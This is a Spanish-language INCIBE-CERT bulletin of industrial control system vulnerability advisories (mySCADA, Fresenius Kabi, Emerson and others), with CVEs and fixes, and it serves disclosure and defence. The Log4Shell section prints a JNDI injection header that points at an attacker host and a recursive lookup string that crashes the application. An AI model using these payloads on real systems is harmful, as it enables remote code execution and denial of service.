Inicio / Content / Boletín de INCIBE-CERT del 22-12-2021

Boletín de INCIBE-CERT del 22-12-2021

Múltiples vulnerabilidades en Drawings Explorer de Open Design Alliance (ODA)

Fecha de publicación: 
22/12/2021
Importancia: 
4 - Alta
Recursos afectados: 

Drawings SDK: versiones anteriores a 2022.12.

Descripción: 

Mat Powell de ZDI Trend Micro ha publicado dos vulnerabilidades de severidad alta, por las que un atacante podría ejecutar código en el contexto del proceso actual.

Solución: 

Open Design Alliance (ODA) ha publicado una actualización para corregir esta vulnerabilidad. Se pueden encontrar más detalles en ODA Security Advisories.

Detalle: 

Existe una vulnerabilidad de validación de entrada inadecuada al leer un archivo BMP, utilizando el SDK de dibujos de Open Design Alliance antes de la versión 2022.12. Los datos elaborados en un archivo BMP pueden desencadenar una operación de escritura más allá del final de un búfer asignado o conducir a un desbordamiento del búfer basado en la pila.

Encuesta valoración

Ejecución arbitraria de código en Cscape EnvisionRV de Horner Automation

Fecha de publicación: 
22/12/2021
Importancia: 
4 - Alta
Recursos afectados: 

Cscape EnvisionRV v4.50.3.1 y anteriores.

Descripción: 

Michael Heinzl ha informado al CISA de esta vulnerabilidad de severidad alta, por la que un atacante podría ejecutar código arbitrario en el contexto del proceso actual.

Solución: 

Actualizar a última versión de Cscape Envision RV.

Para usuarios con instalaciones específicas, ponerse en contacto con la asistencia técnica de Horner Automation:

Detalle: 

Esta vulnerabilidad puede ser explotada mediante el análisis de archivos de proyecto maliciosamente elaborados. Los problemas se deben a la falta de validación adecuada de los datos suministrados por el usuario, lo que puede dar lugar a lecturas y escrituras más allá del final de las estructuras de datos asignadas. Se requiere la interacción del usuario para explotar esta vulnerabilidad, ya que un atacante debe engañar a un usuario válido para que abra un archivo de proyecto HMI malicioso. Se ha asignado el identificador CVE-2021-44462 para esta vulnerabilidad.

Encuesta valoración

Múltiples vulnerabilidades en sistema de automatización Emerson DeltaV

Fecha de publicación: 
22/12/2021
Importancia: 
4 - Alta
Recursos afectados: 

DeltaV DCS, controladores y estaciones de trabajo, todas las versiones.

Descripción: 

Sharon Brizinov, investigador de Claroty, ha reportado 2 vulnerabilidades, 1 con severidad alta y 1 media, cuya explotación podría permitir a un atacante realizar una escalada de privilegios local o reiniciar el controlador, lo que ocasionaría una condición de denegación de servicio (DoS).

Solución: 

Actualizar DeltaV DCS desde Guardian Support Portal a las siguientes versiones:

  • 13.3.1;
  • 14.LTS;
  • 14.FP1;
  • 14.FP2;
  • R6.
Detalle: 
  • Las DLLs que faltan, si son reemplazadas por un insider, podrían permitir a un atacante realizar una escalada de privilegios local cuando se inician algunos servicios de DeltaV. Se ha asignado el identificador CVE-2021-44463 para esta vulnerabilidad alta.

Para la vulnerabilidad con severidad baja se ha asignado el identificador CVE-2021-26264.

Encuesta valoración

Desbordamientos de búfer en LeviStudioU de WECON

Fecha de publicación: 
22/12/2021
Importancia: 
4 - Alta
Recursos afectados: 

LeviStudioU, versión 2019-09-21 y anteriores.

Descripción: 

Natnael Samson (@NattiSamson), trabajando conjuntamente con Trend Micro’s Zero Day Initiative, ha reportado al CISA dos vulnerabilidades de severidad alta, que podrían permitir a un atacante la ejecución remota de código.

Solución: 

Contactar con el soporte técnico de WECON para más información.

Detalle: 
  • El producto afectado es vulnerable a un desbordamiento de búfer basado en la pila (stack), que podría permitir a un atacante la ejecución remota de código. Se ha asignado el identificador CVE-2021-23138 para esta vulnerabilidad.
  • El producto afectado es vulnerable a un desbordamiento de búfer basado en memoria dinámica (heap), que podría permitir a un atacante la ejecución remota de código. Se ha asignado el identificador CVE-2021-23157 para esta vulnerabilidad.

Encuesta valoración

 

Múltiples vulnerabilidades en myPRO de mySCADA

Fecha de publicación: 
22/12/2021
Importancia: 
5 - Crítica
Recursos afectados: 

myPRO, versión 8.20.0 y anteriores.

Descripción: 

Michael Heinzl ha reportado ocho vulnerabilidades al CISA, siete de severidad crítica y una alta, que podrían permitir a un atacante comprometer los productos afectados.

Solución: 

Actualizar a la versión 8.22.0 o superior.

Detalle: 

Las vulnerabilidades de severidad crítica son:

  • Un atacante remoto, no autenticado, podría acceder a la aplicación sin ninguna forma de autenticación o autorización, utilizando una ruta o canal alternativo. Se ha asignado el identificador CVE-2021-43985 para esta vulnerabilidad.
  • Existe una cuenta administrativa adicional, no documentada, en el producto afectado que no está expuesta a través de la interfaz web, que no puede ser eliminada o modificada a través de la interfaz web normal. Se ha asignado el identificador CVE-2021-43987 para esta vulnerabilidad.
  • El producto afectado tiene una interfaz de depuración vulnerable que incluye una utilidad de ping, que podría permitir a un atacante inyectar comandos arbitrarios del sistema operativo. Se ha asignado el identificador CVE-2021-44453 para esta vulnerabilidad.
  • El producto afectado tiene una función en la que se puede especificar la contraseña de la API, lo que podría permitir a un atacante inyectar comandos arbitrarios del sistema operativo a través de un parámetro específico. Se ha asignado el identificador CVE-2021-22657 para esta vulnerabilidad.
  • El producto afectado tiene una función en la que se puede especificar la contraseña, lo que podría permitir a un atacante inyectar comandos arbitrarios del sistema operativo a través de un parámetro específico. Se ha asignado el identificador CVE-2021-23198 para esta vulnerabilidad.
  • El producto afectado tiene una función para enviar correos electrónicos, que podría permitir a un atacante inyectar comandos arbitrarios del sistema operativo a través de un parámetro específico. Se ha asignado el identificador CVE-2021-43981 para esta vulnerabilidad.
  • El producto afectado tiene una función en la que se puede actualizar el firmware, lo que podría permitir a un atacante inyectar comandos arbitrarios del sistema operativo a través de un parámetro específico. Se ha asignado el identificador CVE-2021-43984 para esta vulnerabilidad.

La vulnerabilidad de severidad alta es:

  • El producto afectado almacena las contraseñas utilizando MD5, lo que podría permitir a un atacante descifrar los hashes de las contraseñas previamente recuperadas. Se ha asignado el identificador CVE-2021-43989 para esta vulnerabilidad.

Encuesta valoración

Múltiples vulnerabilidades en Agilia Connect Infusion System de Fresenius Kabi

Fecha de publicación: 
22/12/2021
Importancia: 
4 - Alta
Recursos afectados: 
  • Módulo Wi-Fi Agilia Connect de las bombas vD25 y anteriores;
  • Agilia Link+ v3.0 D15 y anteriores;
  • Vigilant Software Suite v1.0: Vigilant Centerium, Vigilant MasterMed y Vigilant Insight;
  • Software de mantenimiento Agilia Partner v3.3.0 y anteriores.
Descripción: 

Diversos investigadores han notificado 13 vulnerabilidades al BSI (Oficina Federal de Seguridad de la Información de Alemania): 6 con severidad alta y 7 medias. Un atacante podría explotarlas y realizar acciones como el consumo incontrolado de recursos, uso de un algoritmo criptográfico no seguro, credenciales insuficientemente protegidas, control de acceso inadecuado, almacenamiento en texto plano de una contraseña, archivos o directorios accesibles a partes externas, exposición de información a través de listas de directorios, XSS, inyección, uso de credenciales codificadas, utilización de autenticación del lado del cliente y uso de componentes de terceros no mantenidos.

Solución: 

Actualizar a las siguientes versiones:

  • Link+ v3.0 D16 o posteriores;
  • VSS v1.0.3 o posteriores;
  • Agilia Connect Pumps Wifi Module D29 o posteriores;
  • Agilia Connect Partner v3.3.2 o posteriores.
Detalle: 
  • Las solicitudes podrían ser utilizadas para interrumpir el funcionamiento normal del dispositivo. Cuando se explota, Agilia Link+ debe ser reiniciado mediante un hard reset, activado al pulsar un botón en el sistema de rack. Se ha asignado el identificador CVE-2021-23236 para esta vulnerabilidad alta.
  • La interfaz de gestión de Agilia Link+ no aplica el cifrado de la capa de transporte. Por lo tanto, los datos transmitidos podrían ser enviados en texto claro. El cifrado de la capa de transporte se ofrece en el puerto TCP/443, pero el servicio afectado no realiza una redirección automática del servicio no cifrado en el puerto TCP/80 al servicio cifrado. Se ha asignado el identificador CVE-2021-41835 para esta vulnerabilidad alta.
  • La aplicación web en Agilia Link+ implementa los mecanismos de autenticación y gestión de sesiones exclusivamente en el lado del cliente y no protege suficientemente los atributos de autenticación. Se ha asignado el identificador CVE-2021-23196 para esta vulnerabilidad alta.
  • Se podría acceder a los endpoints sensibles sin ninguna información de autenticación, como la cookie de sesión. Un atacante podría enviar solicitudes a endpoints sensibles como un usuario no autenticado para realizar acciones críticas en Agilia Link+ o modificar parámetros de configuración críticos. Se ha asignado el identificador CVE-2021-23233 para esta vulnerabilidad alta.
  • La aplicación Vigilant MasterMed podría permitir la validación de la entrada del usuario en el lado del cliente sin autenticación por parte del servidor. El servidor no debe confiar en la corrección de los datos porque los usuarios podrían no soportar o bloquear JavaScript, así como eludir intencionadamente los controles del lado del cliente. Un atacante con conocimiento del usuario del servicio podría eludir el control del lado del cliente e iniciar sesión con privilegios del servicio. Se ha asignado el identificador CVE-2021-43355 para esta vulnerabilidad alta.
  • El sistema afectado utiliza la biblioteca ExpertPdf y el servidor web lighttpd, que están desactualizados. El software desactualizado podría contener vulnerabilidades no conocidas públicamente, pero que fuesen objeto de ingeniería inversa por parte de un atacante. Se ha asignado el identificador CVE-2020-35340 para esta vulnerabilidad alta.

Para el resto de vulnerabilidades bajas se han asignado los identificadores: CVE-2021-31562, CVE-2021-23207, CVE-2021-33843, CVE-2021-23195, CVE-2021-33848, CVE-2021-44464 y CVE-2021-33846.

Encuesta valoración

[Actualización 23/12/2021] Vulnerabilidad Log4Shell afecta a Sistemas de Control Industrial

Fecha de publicación: 
14/12/2021
Importancia: 
5 - Crítica
Recursos afectados: 

La vulnerabilidad conocida como Log4Shell, detectada en la librería Log4j2 mantenida por Apache Software Foundation, desde la versión 2.0-beta9 hasta la versión 2.14.1, y descrita en nuestro aviso técnico, también ha afectado a fabricantes de Sistemas de Control Industrial.

Entre los fabricantes SCI que integran esta librería y han informado de la vulnerabilidad en sus productos están:

  • Philips:
    • IntelliSpace Precision Medicine (productos sólo de software con sistemas operativos propiedad del cliente),
    • RIS Clinic,
    • IntelliBridge Enterprise (B.13-B.15) (productos sólo de software con sistemas operativos propiedad del cliente),
    • VuePACS,
    • ISPACS (el entorno de hosting de Philips está evaluando la solución proporcionada por VMware y está en proceso de implementación para los clientes de servicios gestionados),
    • [Actualización 22/12/2021] HealthSuite Marketplace (1.2) (el entorno hosting de Philips ha desplegado un parche),
    • IntelliSite Pathology Solution 5.1 (L1),
    • Pathology De-identifier 1.0 (L1),
    • Performance Bridge (3.0) (productos sólo de software con sistemas operativos propiedad del cliente. Para las soluciones de productos en los que el servidor fue proporcionado por Philips, será responsabilidad de Philips validar y proporcionar parches),
    • Pinnacle (18.x),
    • Protocol Applications (1.1) (productos sólo de software con sistemas operativos propiedad del cliente. Para las soluciones de productos en los que el servidor fue proporcionado por Philips, será responsabilidad de Philips validar y proporcionar parches),
    • Scanner Protocol Manager (1.1) (productos sólo de software con sistemas operativos propiedad del cliente. Para las soluciones de productos en los que el servidor fue proporcionado por Philips, será responsabilidad de Philips validar y proporcionar parches),
    • Tasy EMR (productos sólo de software con sistemas operativos propiedad del cliente),
    • Universal Data Manager (UDM).
  • Siemens:
    • E-Car OC Cloud Application, versiones anteriores a 2021-12-13;
    • EnergyIP Prepay, versiones 3.7 y 3.8;
    • todas las versiones de:
      • Industrial Edge Management App (IEM-App);
      • Industrial Edge Management OS (IEM-OS);
      • Industrial Edge Management Hub;
      • LOGO! Soft Comfort;
      • Mendix Applications;
      • Siveillance Control Pro;
      • Siveillance Vantage.
    • Mindsphere Cloud Application, versiones anteriores a 2021-12-11;
    • Operation Scheduler, versión 1.1.3 y superiores;
    • SIGUARD DSA, versiones 4.2, 4.3 y 4.4;
    • SIMATIC WinCC 7.4, versiones anteriores a 7.4 SP1;
    • Siveillance Command, versión 4.16.2.1 y superiores.
    • [Actualización 15/12/2021] Nuevos productos afectados:
      • Desigo CC Info Center, versiones V5.0 y V5.1;
      • Desigo CC Advanced Reporting, versiones V4.0, V4.1, V4.2, V5.0 y V5.1;
      • Comos Desktop App, todas las versiones;
      • Capital, versión 2019.1 SP1912 y superiores, solo si la funcionalidad Teamcenter integration está activada.
    • [Actualización 16/12/2021] puede consultar la lista completa de productos afectados en su página web;
    • [Actualización 17/12/2021] se ha publicado un nuevo producto afectado en su página web;
    • [Actualización 21/12/2021] TraceAlertServerPLUS, todas las versiones.
    • [Actualización 22/12/2021] Distintos modelos de Sensformer Platform, en versiones anteriores a 2.7.0.
  • Rockwell Automation:
    • Plex (A Rockwell Automation Company) Industrial IoT;
    • Fiix (A Rockwell Automation Company) CMMS core V5.
    • [Actualización 16/12/2021] puede consultar la lista completa de productos afectados en su página web;
  • HMS
    • Ewon Talk2M;
    • [Actualización 21/12/2021] eCatcher Windows.

[Actualización 15/12/2021] Nuevos fabricantes afectados:

  • Wibu-Systems:
    • CodeMeter Keyring for TIA Portal, versiones anteriores a la 1.30 (solo afecta a Password Manager);
    • CodeMeter Cloud Lite, versiones anteriores a la 2.2.
  • Johnson Controls:
    • se está analizando el impacto de esta vulnerabilidad en sus productos.
    • se recomienda revisar las guías hardening y deployment de productos para garantizar que se han desplegado de acuerdo con los requisitos de diseño y funcionamiento del producto.
    • [Actualización 21/12/2021] exacq Enterprise Manager, versión 21.12 y anteriores.
    • [Actualización 22/12/2021] OpenBlue Bridge y RFID Overhead360° Backend.
  • Wind River:
    • Wind River Studio Analytics.

[Actualización 16/12/2021] Nuevos fabricantes afectados:

  • Schneider Electric, puede consultar la lista de productos afectados en su página web;
  • ABB, puede consultar la lista de productos afectados en su página web. Algunos de sus productos se ven afectados por la vulnerabilidad CVE-2021-4104;
  • B&R, puede consultar la lista de productos afectados en su página web. Algunos de sus productos se ven afectados por la vulnerabilidad CVE-2021-4104;
  • Phoenix Contact, puede consultar la lista de productos afectados en su página web;
  • HMS, puede consultar la lista de productos afectados en su página web.

[Actualización 17/12/2021] Nuevos fabricantes afectados:

  • General Electric, puede consultar la lista de productos afectados en su página web;
  • Philips, puede consultar la lista de productos afectados en su página web.
  • [Actualización 22/12/2021] Bosch, puede consultar la lista de productos afectados en sus páginas web BOSCH-SA-572602 [Actualización 23/12/2021] y BOSCH-SA-993110-BT.

Además, cabe destacar la importancia de analizar y revisar la afectación de otros productos y servicios de ámbito interno.

[Actualización 20/12/2021] Se ha detectado una vulnerabilidad de denegación de servicio (DoS), de severidad alta, que afecta a las versiones 2.0-alpha1 hasta 2.16, concretamente al archivo log4j-core JAR, y que lleva asociada el identificador CVE-2021-45105.

[Actualización 23/12/2021] La vulnerabilidad CVE-2021-45105 afecta a las versiones 2.0-beta9 hasta 2.16.0 excluyendo 2.12.3. La vulnerabilidad CVE-2021-45046 afecta a las versiones 2.0-beta9 hasta 2.15.0 excluyendo 2.12.2.

Descripción: 

Chen Zhaojun, investigador de Alibaba Cloud Security Team, ha descubierto una vulnerabilidad 0day crítica, que se ha denominado Log4Shell, que podría ser explotada por un atacante remoto no autenticado para ejecutar código arbitrario (RCE), y que varios fabricantes de SCI han detectado en algunos de sus productos.

Solución: 
  • [Actualización 15/12/2021] La versión 2.15.0 no soluciona completamente la vulnerabilidad ya que estaba incompleta en determinadas configuraciones, lo que podría permitir a un atacante la denegación del servicio. La versión Log4j 2.16.0 soluciona este problema eliminando el soporte para los patrones de búsqueda de mensajes y desactivando la funcionalidad JNDI por defecto. Como medidas de mitigación, aplicar las que aparecen listadas en el apartado Solución de nuestro aviso técnico.
  • Para los productos de Siemens, actualizar a las versiones indicadas en el apartada AFFECTED PRODUCTS AND SOLUTION de [Actualización 22/12/2021] sus avisos SSA-661247 y SSA-479842.
  • Para los productos de Rockwell Automation:
    • Plex Industrial IoT: no es necesario que el usuario actúe, ya que el producto ya tiene aplicada la mitigación y ya no está afectado. Además, el 13/12/21 se publicará un parche para actualizar Log4j2 a la versión 2.15.
    • Fiix CMMS core V5: no es necesaria ninguna acción por parte del usuario, ya que el producto se ha actualizado a la versión 2.15 de Log4j2.
  • HMS Ewon ha aplicado los parches necesarios en su infraestructura cloud Talk2M. [Actualización 21/12/2021] Actualizar eCatcher Windows a la versión 6.7.7.
  • [Actualización 15/12/2021] Soluciones para los nuevos productos afectados:
    • Wibu-Systems si en los productos afectados se está utilizando Wibu-Systems’ hosting service (WOPS), no es necesario realizar ninguna acción. En caso contrario, actualizar log4j a la versión 2.16.0.
    • Johnson Controls está analizando el impacto de esta vulnerabilidad, publicarán cualquier parche recomendado o actualización de productos en su página web de seguridad de productos. [Actualización 21/12/2021] Actualizar exacq Enterprise Manager a la versión 21.12.1 o aplicar los pasos de mitigación manual.
    • Wind River Studio Analytics contiene una versión vulnerable de Log4j, están trabajando para desarrollar, testear y lanzar un parche lo antes posible.
  • [Actualización 16/12/2021] Soluciones para los nuevos productos afectados:
    • Para los productos Schneider Electric, actualizar a las versiones indicadas en el apartada Final Remediation/Mitigation de su aviso;
    • Para los productos ABB, actualizar a las versiones indicadas en el apartada General security recommendations de su aviso;
    • Para los productos B&R, actualizar a las versiones indicadas en el apartada Supporting information and guidelines de su aviso;
    • Para los productos Phoenix Contact, actualizar a las versiones indicadas en el apartada General recommendation de su aviso;
    • Para los productos HMS, actualizar a las versiones indicadas en el apartada HMS Recommendations de su aviso.
  • [Actualización 20/12/2021] Para corregir la vulnerabilidad de DoS identificada con CVE-2021-45105, los usuarios de Java 8 (o posteriores) deben actualizar Log4j a la versión 2.17.0. Adicionalmente, se pueden adoptar unas medidas de mitigación en la configuración.
  • [Actualización 22/12/2021] Para los productos Bosch afectados, actualizar a la última versión de IoT Gateway y aplicar las medidas de mitigación descritas en su aviso. [Actualización 23/12/2021] Actualizar el firmware de PRA-APAS a la versión 1.0.32.
  • [Actualización 23/12/2021] CISA, FBI, NSA, ACSC, CCCS, CERT NZ, NZ NCSC y NCSC-UK han publicado un aviso conjunto de ciberseguridad, en forma de alerta AA21-356A, para proporcionar una guía de mitigación de las vulnerabilidades en la librería de software Log4j de Apache.
  • [Actualización 23/12/2021] Para solucionar CVE-2021-45105, actualizar a Log4j 2.3.1 (para Java 6), 2.12.3 (para Java 7) o 2.17.0 (para Java 8 y posteriores). Para solucionar CVE-2021-45046, actualizar a Log4j 2.3.1 (para Java 6), 2.12.3 (para Java 7) o 2.17.0 (para Java 8 y posteriores).
Detalle: 

La vulnerabilidad se origina de la forma en que los mensajes de registro son gestionados por el procesador Log4j. Si un atacante envía un mensaje especialmente diseñado:

User-Agent: ${jndi:ldap://<host>:<port>/<path>}

Podría resultar en la carga de una clase de código externo o la búsqueda de mensajes y la ejecución de ese código, lo que llevaría a una RCE. Se ha asignado el identificador CVE-2021-44228 para esta vulnerabilidad.

Debido a que algunas funciones de Apache Log4j realizan análisis recursivos, los atacantes podrían diseñar peticiones maliciosas para desencadenar vulnerabilidades de ejecución remota de código.

IMPORTANTE: esta vulnerabilidad podría estar explotándose de manera activa.

[Actualización 20/12/2021] Si se intenta una sustitución de cadena en la cadena que aparece a continuación, se desencadenará una recursión infinita, y la aplicación se bloqueará:

${${::-${::-$${::-j}}}}

Encuesta valoración